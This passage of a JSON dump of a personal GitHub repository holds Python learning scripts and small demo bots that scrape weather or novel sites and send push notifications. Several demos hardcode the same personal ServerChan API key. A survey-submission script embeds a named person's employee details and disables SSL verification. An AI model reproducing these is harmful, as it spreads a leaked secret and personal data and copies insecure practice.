"permissive", "max_line_length": 66, "num_lines": 10, "path": "/10sorted.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-13\n# 排序算法\n\nfrom operator import itemgetter\nstudents = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\nprint(sorted(students, key=itemgetter(0)))\nprint(sorted(students, key=lambda t: t[1]))\nprint(sorted(students, key=itemgetter(1), reverse=True))\n" }, { "alpha_fraction": 0.5365168452262878, "alphanum_fraction": 0.5533707737922668, "avg_line_length": 15.952381134033203, "blob_id": "199d2ca82042e346eab502382cc2ef50e5273693", "content_id": "eca1954a4bbb2964cfa1b1e4c4548c16d515b0e0", "detected_licenses": [ 
"MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "permissive", "max_line_length": 53, "num_lines": 21, "path": "/OOP/ooptest.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n'oop demo'\n\n__author__ = 'zuosc'\n\n\nclass Student(object):\n def __init__(self, name, score):\n self.__name = name\n self.__score = score\n\n def print_score(self):\n print('%s: %s' % (self.__name, self.__score))\n\n\nbart = Student('Bart', 59)\nlisa = Student('Lisa', 87)\n\nbart.print_score()\n" }, { "alpha_fraction": 0.5057471394538879, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 16.200000762939453, "blob_id": "80ea0af736123d4feae606733b2c2a5426712751", "content_id": "1f05a91fc403fd87d9048d27163980965bd35dc6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 103, "license_type": "permissive", "max_line_length": 27, "num_lines": 5, "path": "/advancedOOP/slots.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n# Power by zuosc 2015-10-23\n\n'面向对象高级编程'\n\n" }, { "alpha_fraction": 0.6206896305084229, "alphanum_fraction": 0.746081531047821, "avg_line_length": 23.615385055541992, "blob_id": "46d1cb89e8df8061a4de02d4fc941d1a08f761ca", "content_id": "4d1c292749c4249a3f60ba0fd96ec2a315a4461c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "permissive", "max_line_length": 88, "num_lines": 13, "path": "/Demo/NotifyCrystalMine.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by zuosc\n\n\nimport urllib.parse\nimport urllib.request\n\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':\"水晶矿场\",'desp':\"快去收钱!!!\"}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)" }, { "alpha_fraction": 0.5910852551460266, "alphanum_fraction": 0.6405038833618164, "avg_line_length": 24.073171615600586, "blob_id": "1e98a323634b14701d1e0c90af6758a371463721", "content_id": "dc7c3dfc2d559002de90d7d20115c15660527319", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1040, "license_type": "permissive", "max_line_length": 94, "num_lines": 41, "path": "/Demo/xiaoshuo_xjzm.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef getLatChapter():\n addr = 'http://m.09xs.com/info-48609/'\n html = urllib.request.urlopen(addr).read()\n soup = BeautifulSoup(html, 'html.parser')\n lastChapter = soup.find_all('a')[8]['href']\n return lastChapter\n\n\ndef sengMsg(chapter):\n mAddr = 'http://m.09xs.com/'+chapter\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"玄界之门\", 'desp': mAddr}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\ntry:\n lastChapter = getLatChapter()\n f = open('xuanjiezhimen.txt', 'r')\n content = f.read()\n\n if content == lastChapter:\n pass\n\n else:\n f = open('xuanjiezhimen.txt', 'w')\n f.write(lastChapter)\n sengMsg(lastChapter)\n f.close()\nexcept:\n f = open('xuanjiezhimen.txt', 'w')\n 
f.write(getLatChapter())\n f.close()\n sengMsg(lastChapter)\n\n\n\n\n" }, { "alpha_fraction": 0.30442479252815247, "alphanum_fraction": 0.3486725687980652, "avg_line_length": 24.68181800842285, "blob_id": "245a1a909a9d2fef3625a0ea39861a389beac37f", "content_id": "e560a51287e0d8c73f791893e8f87f20d786abcc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "permissive", "max_line_length": 72, "num_lines": 44, "path": "/1parameter.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 函数参数的例子\n\n\ndef person(name, age, *, city, job): # 关键字参数\n print(name, age, city, job)\n\n\nperson('Jack', 24, city='beijing', job='Engineer')\n\n\n# *args是可变参数,args接收的是一个tuple\n# **kw是关键字参数,kw接收的是一个dict\ndef f1(a, b, c=0, *args, **kw):\n print('a = ', a, 'b = ', b, 'c = ', c, 'args = ', args, 'kw = ', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a = ', a, 'b = ', b, 'c = ', c, 'd = ', d, 'kw = ', kw)\n\n\nf1(1, 2)\nprint('----------------------------------------------')\nf1(1, 2, c=0)\nprint('----------------------------------------------')\nf1(1, 2, 3, 'a', 'b')\nprint('----------------------------------------------')\nf1(1, 2, 3, 'a', 'b', x=99)\nprint('----------------------------------------------')\nf2(1, 2, d=99, ext=None)\nprint('----------------------------------------------')\nargs = (1, 2, 3, 4)\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nprint('----------------------------------------------')\n\nargs = (1, 2, 3)\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n\nprint('----------------------------------------------')\n\nprint('对于任意函数,都可以通过类似func(*args, **kw)的形式调用它,无论它的参数是如何定义的。')\n" }, { "alpha_fraction": 0.5678980350494385, "alphanum_fraction": 0.5819458961486816, "avg_line_length": 30.252033233642578, "blob_id": "88fabf92998380da8cf2f81f83f93daffc1ca5f0", "content_id": "e8ae618db59496e82f6f368e8eff6be98ca30a36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3860, "license_type": "permissive", "max_line_length": 231, "num_lines": 123, "path": "/learning.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr'''\nlearning.py\n\nA Python 3 tutorial from http://www.liaoxuefeng.com\n\nUsage:\n\npython3 learning.py\n'''\n\nimport sys\n\n\ndef check_version():\n v = sys.version_info\n if v.major == 3 and v.minor >= 4:\n return True\n print('Your current python is %d.%d. Please use Python 3.4.' %\n (v.major, v.minor))\n return False\n\n\nif not check_version():\n exit(1)\n\nimport os, io, json, subprocess, tempfile\nfrom urllib import parse\nfrom wsgiref.simple_server import make_server\n\nEXEC = sys.executable\nPORT = 39093\nHOST = 'local.liaoxuefeng.com:%d' % PORT\nTEMP = tempfile.mkdtemp(suffix='_py', prefix='learn_python_')\nINDEX = 0\n\n\ndef main():\n httpd = make_server('127.0.0.1', PORT, application)\n print('Ready for Python code on port %d...' 
% PORT)\n httpd.serve_forever()\n\n\ndef get_name():\n global INDEX\n INDEX = INDEX + 1\n return 'test_%d' % INDEX\n\n\ndef write_py(name, code):\n fpath = os.path.join(TEMP, '%s.py' % name)\n with open(fpath, 'w', encoding='utf-8') as f:\n f.write(code)\n print('Code wrote to: %s' % fpath)\n return fpath\n\n\ndef decode(s):\n try:\n return s.decode('utf-8')\n except UnicodeDecodeError:\n return s.decode('gbk')\n\n\ndef application(environ, start_response):\n host = environ.get('HTTP_HOST')\n method = environ.get('REQUEST_METHOD')\n path = environ.get('PATH_INFO')\n if method == 'GET' and path == '/':\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [\n b'<html><head><title>Learning Python</title></head><body><form method=\"post\" action=\"/run\"><textarea name=\"code\" style=\"width:90%;height: 600px\"></textarea><p><button type=\"submit\">Run</button></p></form></body></html>'\n ]\n if method == 'GET' and path == '/env':\n start_response('200 OK', [('Content-Type', 'text/html')])\n L = [b'<html><head><title>ENV</title></head><body>']\n for k, v in environ.items():\n p = '<p>%s = %s' % (k, str(v))\n L.append(p.encode('utf-8'))\n L.append(b'</html>')\n return L\n if host != HOST or method != 'POST' or path != '/run' or not environ.get(\n 'CONTENT_TYPE',\n '').lower().startswith('application/x-www-form-urlencoded'):\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"bad_request\"}']\n s = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH']))\n qs = parse.parse_qs(s.decode('utf-8'))\n if not 'code' in qs:\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"invalid_params\"}']\n name = qs['name'][0] if 'name' in qs else get_name()\n code = qs['code'][0]\n headers = [('Content-Type', 'application/json')]\n origin = environ.get('HTTP_ORIGIN', '')\n if origin.find('.liaoxuefeng.com') == -1:\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"invalid_origin\"}']\n headers.append(('Access-Control-Allow-Origin', origin))\n start_response('200 OK', headers)\n r = dict()\n try:\n fpath = write_py(name, code)\n print('Execute: %s %s' % (EXEC, fpath))\n r['output'] = decode(\n subprocess.check_output(\n [EXEC, fpath], stderr=subprocess.STDOUT, timeout=5))\n except subprocess.CalledProcessError as e:\n r = dict(error='Exception', output=decode(e.output))\n except subprocess.TimeoutExpired as e:\n r = dict(error='Timeout', output='执行超时')\n except subprocess.CalledProcessError as e:\n r = dict(error='Error', output='执行错误')\n print('Execute done.')\n return [json.dumps(r).encode('utf-8')]\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 14.5, "blob_id": "7922a1ba50d462143bb326b1a47e121b09e80df8", "content_id": "3135d2b75f29462c15d2ace90bbb31288a702250", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# PythonCode\nPython Study Code\n" }, { "alpha_fraction": 0.49130937457084656, "alphanum_fraction": 0.5191193222999573, "avg_line_length": 14.410714149475098, "blob_id": "ec0efe85be0b697d6db06418c2545fcdb56b83b2", "content_id": "50643b4ef5e00307557b6e4858e840cf27a4c89c", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 987, "license_type": "permissive", "max_line_length": 64, "num_lines": 56, "path": "/9filter.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc\n# filter filter()把传入的函数依次作用于每个元素,然后根据返回值是True还是False决定保留还是丢弃该元素。\ndef is_odd(n):\n return n % 2 == 1\n\n\nprint(list(filter(is_odd, [1, 2, 3, 4, 5, 6, 7])))\n\n\ndef not_empty(s):\n return s and s.strip()\n\n\nprint(list(filter(not_empty, ['a', 'bb', None, 'cccc'])))\n\n# 素数的获取\n\n\ndef _odd_iter():\n n = 1\n while True:\n n = n + 2\n yield n\n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\n\ndef primes():\n yield 2\n it = _odd_iter() # 初始序列\n while True:\n n = next(it) # 返回序列的第一个数字\n yield n\n it = filter(_not_divisible(n), it)\n\n\nfor n in primes():\n if n < 1000:\n print(n)\n else:\n break\n\n\nprint('----------------------------------------')\n\n# 回数的获取\n\n\ndef is_palindrome(n):\n return int(str(n)[::-1]) == n\n\n\nprint(list(filter(is_palindrome, range(1, 1000))))\n" }, { "alpha_fraction": 0.6766381859779358, "alphanum_fraction": 0.747863233089447, "avg_line_length": 24.962963104248047, "blob_id": "3847cebf70241cdd66d8f9a31e8ad227f7c3501a", "content_id": "4e6107ad7eacb78e0195e1269767743daeaac59b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 88, "num_lines": 27, "path": "/Demo/Weather.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# /usr/bin/env python3\n# Power by zuosc\n\n\nimport json\nimport gzip\nimport urllib.parse\nimport urllib.request\n\n\nweatherApiAdder = 'http://wthrcdn.etouch.cn/weather_mini?'\nsuzhouKey ='101190401'\nparams = urllib.parse.urlencode({'citykey': suzhouKey})\nresult = urllib.request.urlopen(weatherApiAdder+ params).read()\njsonData = gzip.decompress(result).decode('utf8')\nprint(jsonData)\n\ndata = json.loads(jsonData)\n\ntitle = '今日天气'\ncontent = '当前温度:'+data[\"data\"][\"wendu\"]+'\\r\\n'\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':title,'desp':content}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)\n\n" }, { "alpha_fraction": 0.5937052965164185, "alphanum_fraction": 0.6502146124839783, "avg_line_length": 47.17241287231445, "blob_id": "9454fc3fad5dcaffc2bc09e28170c9dad07d8e97", "content_id": "51dec782115a4df07b1b434e3678ab589c856947", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1424, "license_type": "permissive", "max_line_length": 763, "num_lines": 29, "path": "/Demo/postTencent.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n__author__='zuosc'\n\n\nimport urllib.request\nimport urllib.parse\nimport time\nimport ssl\nimport json\n\ntime1 = int(time.time())\ndate = time.strftime(\"%m.%d\", time.localtime()) \n\ndata = urllib.parse.urlencode({'survey_id': 923450, 'answer_survey': '{\"id\":\"923450\",\"survey_type\":0,\"jsonLoadTime\":49,\"ldw\":\"F3D636F9-7582-415F-A659-E5EE23CDDDAD\",\"time\":%d,\"ua\":\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\",\"openid\":\"\",\"pages\":[{\"id\":\"1\",\"questions\":[]},{\"id\":\"p-2-VstM\",\"questions\":[{\"id\":\"q-1-ZzWp\",\"type\":\"text\",\"text\":\"左思成\",\"options\":[],\"blanks\":[]},{\"id\":\"q-2-Ibet\",\"type\":\"text\",\"text\":\"32137\",\"options\":[],\"blanks\":[]},{\"id\":\"q-3-qtan\",\"type\":\"text\",\"text\":\"大度假自营包团研发组\",\"options\":[],\"blanks\":[]},{\"id\":\"q-4-RhRM\",\"type\":\"text\",\"text\":\"{%s}\",\"options\":[],\"blanks\":[]},{\"id\":\"q-5-lpN1\",\"type\":\"textarea\",\"text\":\"\",\"options\":[],\"blanks\":[]}]}],\"referrer\":\"\"}' % (time1,date)})\ndata = data.encode('utf-8')\nrequest = urllib.request.Request(\"https://wj.qq.com/sur/collect_answer\")\n# adding charset parameter to the Content-Type header.\nrequest.add_header(\"Content-Type\",\"application/x-www-form-urlencoded;charset=utf-8\")\n\ncontext = ssl._create_unverified_context()\nf = urllib.request.urlopen(request, data,context=context)\n\nresponse = f.read().decode('utf-8')\n\nprint(response)\n\ntime.sleep(2)\n\n" }, { "alpha_fraction": 0.46684709191322327, "alphanum_fraction": 0.5047361254692078, "avg_line_length": 17.94871711730957, "blob_id": "f8fbca031d6ce18e5ddcbe4bf45ac5fa4fa3ebe2", "content_id": "86e71103e71ca9896cc8021d171d62304bb3f3ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 749, "license_type": "permissive", "max_line_length": 50, "num_lines": 39, "path": "/6listcomprehensions.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n# 列表生成器\n\nl = list(range(1, 10))\nprint(l)\n\nL = []\nfor x in range(1, 11):\n L.append(x * x)\nprint(L)\n\nLL = [x * x for x in range(1, 11)]\nprint(LL)\n\nLLL = [x * x for x in range(1, 11) if x % 2 == 0]\nprint(LLL)\n\nLLLL = [m + n for m in 'ABC' for n in 'XYZ']\nprint(LLLL)\n\nimport os\ndirs = [d for d in os.listdir('C:')]\nprint(dirs)\n\nd = {'a': 'X', 'b': 'Y', 'c': 'Z', 'd': 'D'}\nfor k, v in d.items():\n print(k + '=' + v)\n print(k, '=', v)\n\nprint([k + '=' + v for k, v in d.items()])\n\nL = ['Hello', 'World', 'IBM', 'APPLE', 'DJ']\nprint([s.lower() for s in L])\n\nprint('---------------')\nL1 = ['HELLO', 'WORLD', 5, 'ZORRO', None]\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\nprint(L2)\n" }, { "alpha_fraction": 0.3096666634082794, "alphanum_fraction": 0.3863333463668823, "avg_line_length": 17.75, "blob_id": "8ce10be9c029f922dfbdeda81c85e0b13f280361", "content_id": "d8269617c12d365ea184c788f1d901406fecf0ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3202, "license_type": "permissive", "max_line_length": 74, "num_lines": 160, "path": "/8mapandreduce.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-12\n#map和reduce\n\n\ndef f(x):\n return x * x\n\n\nr = map(f, [1, 2, 3, 4, 5, 6, 
7])\n\nprint(list(r))\n\nprint('---------------------------------')\n\nprint(list(map(str, [1, 2, 3, 4, 5, 6, 7, 8, 9])))\n\nprint('----------------------------------')\n\n\ndef add(x, y):\n return x + y\n\n\nfrom functools import reduce\n\nr = reduce(add, [1, 2, 1, 2, 2])\nprint(r)\n\nprint('----------------------------')\n\n\ndef fn(x, y):\n return x * 10 + y\n\n\nr = reduce(fn, [1, 2, 3, 9])\nprint(r)\nprint('---------------------------')\n\n\ndef fn(x, y):\n return x * 10 + y\n\n\ndef char3num(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n\nr = reduce(fn, map(char3num, '44885'))\n\nprint(r)\n\n#################################################################\n\n\ndef str2int(s):\n def fn(x, y):\n return x * 10 + y\n\n def char2num(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n#使用lambda\n#return reduce(lambda x, y: x * 10 + y, map(char2num, s))\n\n return reduce(fn, map(char2num, s))\n\nprint(str2int('123123123123'))\n\n\ndef prod(L):\n return reduce(lambda x, y: x * y, L)\n\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\n\n# 练习 (3)\n# 利用map和reduce编写一个str2float函数,把字符串'123.456'转换成浮点数123.456\n\n\n# 函数定义\ndef str2float(s):\n # 通过 ‘.’ 分割数字字符串,赋值对应的 ‘.’ 左右字符串变量\n l_s_int, r_s_float = s.split('.')\n # 字符串 ‘.’ 右侧长度\n r_s_len = len(r_s_float)\n\n # 字符转数字函数\n def char2int(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n# 左侧-整数字符串转换\n\n l_transfer = reduce(lambda x, y: x * 10 + y, map(char2int, l_s_int))\n # 右侧-整数字符串转换\n r_transfer = reduce(lambda x, y: x * 10 + y, map(char2int, r_s_float))\n\n # 注意:\n # (1)、r_transfer / 10 ** r_s_len: expression python2 return 0\n # (1)、r_transfer / 10 ** r_s_len: expression python3 return 0.456\n return l_transfer + r_transfer / 10**r_s_len\n\nprint(str2float('123.456'))\nprint(type(str2float('123.456')))\n\n\ndef str2float(s):\n l_int, r_int = s.split('.')\n\n r_len = len(r_int)\n\n # 字符转数字函数\n def char2int(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n l_tr = reduce(lambda x, y: x * 10 + y, map(char2int, l_int))\n\n r_tr = reduce(lambda x, y: x * 10 + y, map(char2int, r_int))\n\n return l_tr + r_tr / 10**r_len\n\n\nprint(str2float('1454654.1524814'))\n" }, { "alpha_fraction": 0.5569230914115906, "alphanum_fraction": 0.5907692313194275, "avg_line_length": 13.17391300201416, "blob_id": "1062dd5492e477d846c8caa50897435150d5811b", "content_id": "26f579a2c3411a5d266fd876a1b84445cf1f0f88", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "permissive", "max_line_length": 48, "num_lines": 23, "path": "/16enum.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc\n# 枚举\n\nfrom enum import Enum,unique\n\n@unique\nclass Weekeday(Enum):\n Sun = 0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\nday1 = Weekeday.Mon\nprint(day1.value)\n\nprint(Weekeday(1))\n\nfor name,member in Weekeday.__members__.items():\n print(name,'=>',member)" }, { "alpha_fraction": 0.553459107875824, "alphanum_fraction": 0.704402506351471, "avg_line_length": 18.75, "blob_id": "5bf2f834a10270bcf06be616534eb4e24ccbf8bf", "content_id": "9377cff486dadfa7e3e62013c2163910456a4d7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 165, "license_type": "permissive", "max_line_length": 37, "num_lines": 8, "path": "/14partialfunction.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-16\n# Partial Function 偏函数\n\nimport functools\nint2 = functools.partial(int, base=2)\n\nprint(int2('101001010101'))\n\n" }, { "alpha_fraction": 0.4058956801891327, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 11.970588684082031, "blob_id": "1a6186a5ad52e8a844c66a393bc7ec19e67c29ce", "content_id": "3ec8657ed59d2b4a8e0ed13366d054e39e5e41ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 976, "license_type": "permissive", "max_line_length": 43, "num_lines": 68, "path": "/12returnfun.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc\n# 返回函数\n\n\ndef calc_sum(*args):\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\n\ndef lazy_sum(*args):\n def sum():\n ax = 0\n for n in args:\n ax = ax + n\n return ax\n\n return sum\n\n\nf = lazy_sum(1, 3, 5, 7, 9)\nprint(f)\nprint(f())\n\nprint('-------------------------')\nf1 = lazy_sum(1, 3, 5, 7, 9)\nf2 = lazy_sum(1, 3, 5, 7, 9)\nprint(f1 == f2)\n\n# 闭包\n# 返回闭包时牢记的一点就是:返回函数不要引用任何循环变量,或者后续会发生变化的变量。\n\n\ndef count():\n fs = []\n for i in range(1, 4):\n\n def f():\n return i * i\n\n fs.append(f)\n return fs\n\n\nf1, f2, f3 = count()\n\nprint(f1())\n\nprint('-------------------')\n\n\ndef countnew():\n def f(j):\n def g():\n return j * j\n return g\n\n fs = []\n for i in range(1, 4):\n fs.append(f(i))\n return fs\n\n\nf4, f5, f6 = countnew()\n\nprint(f5())\n" }, { "alpha_fraction": 0.6526526808738708, "alphanum_fraction": 0.7227227091789246, "avg_line_length": 39, "blob_id": "e8fed654389443fed98330abe207fa779b6d4e24", "content_id": "6b8b8326c97a011ac02f937c11796882bb8b9ce5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1041, "license_type": "permissive", "max_line_length": 261, "num_lines": 25, "path": "/Demo/xinzhiWeather.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by zuosc\n\n\nimport json\nimport urllib.parse\nimport urllib.request\n\n\nweatherApiAdder = 'http://widget.thinkpage.cn/api/weather?flavor=slim&location=WX4FBXXFKE4F&geolocation=enabled&language=zh-chs&unit=c&theme=chameleon&container=weather-widget&bubble=enabled&alarmType=circle&uid=UE4B455F4F&hash=cfc949b4b932fff04040f9c9f776018b'\nresult = urllib.request.urlopen(weatherApiAdder).read()\njsonData = result.decode('utf8')\ndata = json.loads(jsonData)\n\ntitle = '今日天气'\ncontent ='今日天气:' + data[\"weather\"][\"now\"][\"text\"] \\\n + ' \\r\\n当前温度:' + data[\"weather\"][\"now\"][\"temperature\"]+'℃'\nif data[\"weather\"][\"alarms\"]:\n content = content + ' \\r\\n天气报警:' + data[\"weather\"][\"alarms\"][0][\"type\"] + data[\"weather\"][\"alarms\"][0][\"level\"] + '预警'\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':title,'desp':content}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)" }, { "alpha_fraction": 0.5353260636329651, "alphanum_fraction": 0.5625, "avg_line_length": 13.192307472229004, "blob_id": "ee04250b26921f9a57e7f7ab740339e5f830c262", "content_id": "30bb165a48af391e36bc79c24cae555dfa30f593", "detected_licenses": [ "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "permissive", "max_line_length": 40, "num_lines": 26, "path": "/OOP/subclass.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-23\n\n'subclass demo 继承和多态'\n\n\nclass Animal(object):\n def run(self):\n print('Animal is running......')\n\n\nclass Dog(Animal):\n def run(self):\n print('Dog is running.....')\n\n def eat(self):\n print('dog is eating......')\n\n\nclass Cat(Animal):\n pass\n\n\ndog = Dog()\ndog.run()" }, { "alpha_fraction": 0.5379061102867126, "alphanum_fraction": 0.5679903626441956, "avg_line_length": 16.3125, "blob_id": "601445afba24845f9ea30962e2fee2573ca3ce0b", "content_id": "630d090c6c024f67f4774f669ee0f0a45909129d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "permissive", "max_line_length": 75, "num_lines": 48, "path": "/13decorator.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# _*_ coding:utf8 _*_\n# Power by zuosc 2016-10-13\n# Decorator 装饰器\n\nimport functools\n\n\ndef log(func):\n @functools.wraps(func) # 解决依赖函数签名的代码,因为这里返回的函数名已经变为wrapper了,不是now了\n def wrapper(*args, **kw):\n print('call %s():' % func.__name__)\n return func(*args, **kw)\n\n return wrapper\n\n\n@log # 相当于 now = log(now)\ndef now():\n print('2016-10-17')\n\n\nprint(now())\n\nprint('----------------------')\n\n# 带参数的\n\nimport functools\n\n\ndef log(text):\n def decorator(func):\n @functools.wraps(func) # 解决依赖函数签名的代码,因为这里返回的函数名已经变为wrapper了,不是now了\n def wrapper(*args, **kw):\n print('%s %s():' % (text, func.__name__))\n return func(*args, **kw)\n\n return wrapper\n\n return decorator\n\n\n@log('记录日志,调试程序:') # 相当于 now = log('execute')(now)\ndef now():\n print('2016-10-17')\n\n\nprint(now())\n" }, { "alpha_fraction": 0.4032786786556244, "alphanum_fraction": 0.44590163230895996, "avg_line_length": 15.052631378173828, "blob_id": "83250bffdf231fc011b3c7fa9c01ebb987c73a9e", "content_id": "ffee9cb3e49c024d6b711652245eb145d39c2825", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "permissive", "max_line_length": 35, "num_lines": 19, "path": "/3hanoi.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 汉诺塔\n\n\ndef move(S, E):\n print(S + '-------->' + E)\n\n\ndef hanoi(n, src, tmp, dst):\n if n == 1:\n move(src, dst)\n else:\n hanoi(n - 1, src, dst, tmp)\n move(src, dst)\n hanoi(n - 1, tmp, src, dst)\n\n\nhanoi(5, 'A', 'B', 'C')\n" }, { "alpha_fraction": 0.41473397612571716, "alphanum_fraction": 0.45839017629623413, "avg_line_length": 19.94285774230957, "blob_id": "0fe44ee9cb951261983d27b4dacdee38b59cc62e", "content_id": "2ae7b68ab8ff05ad4850921b1fafbee2df678d41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 47, "num_lines": 35, "path": "/5iteration.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n# 数据迭代\n\nd = {'a': 1, 'b': 2, 'c': 3} #d是字典 无序的\nfor key in d:\n print(key)\n\nprint('---------------------------')\nfor value in d.values():\n print(value)\n\nprint('----------------------------')\n\nfor item in d.items():\n print(item)\n\nprint('*********************')\nfor ch in 
